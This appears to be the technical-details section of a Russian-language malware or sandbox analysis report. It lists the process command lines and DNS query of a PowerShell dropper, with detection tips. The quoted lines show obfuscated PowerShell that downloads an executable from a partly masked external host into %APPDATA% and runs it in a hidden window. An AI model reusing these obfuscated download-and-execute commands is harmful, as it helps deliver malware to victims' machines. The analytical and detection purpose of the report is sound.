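Техническая информация
Примечание: ниже перечислены командные строки запущенных процессов и DNS-запрос; длинные строки обрезаны («...»), а часть имени домена заменена на «###». В командах PowerShell применена обфускация: имя New-Object получено через подстановочный шаблон Get-Command (GCM *W-O*), код собран из строковых фрагментов и передан в IEX, после чего файл загружается в %APPDATA% и запускается. Окно процесса при этом скрыто (ShowWindow = 0 в Win32_ProcessStartup, запуск через start /min). Для обнаружения полезны журналирование блоков сценариев PowerShell (событие 4104), где код фиксируется уже в собранном виде, и аудит создания процессов с записью командной строки (событие 4688 или Sysmon, событие 1). Характерные признаки — цепочка cmd.exe → powershell.exe с обращением к WMI-классу Win32_Process и запуск исполняемого файла из %APPDATA%.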
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Computer = '.';$c = [WMICLASS]"""\\$computer\root\cimv2:WIn32_Process""";$f =[WMICLASS]"""\\$computer\root\cimv2:Win32_ProcessStartup""";$ty =$f.CreateInstance();$ty.ShowWindow = 0;$proc = $c....
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://cy###ink.com/retro.exe'',''%APPDATA%''+''\soft.exe'')'|IEX; start-process('%APPDATA%' +'\soft.ex...
- DNS ASK cy###ink.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://cy###ink.com/retro.exe'',''%APPDATA%''+''\soft.exe'')'|IEX; start-process('%APPDATA%' +'\soft.ex...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /min powershell $Computer = '.';$c = [WMICLASS]"""\\$computer\root\cimv2:WIn32_Process""";$f =[WMICLASS]"""\\$computer\root\cimv2:Win32_ProcessStartup""";$ty =$f.CreateInstance();$ty.S...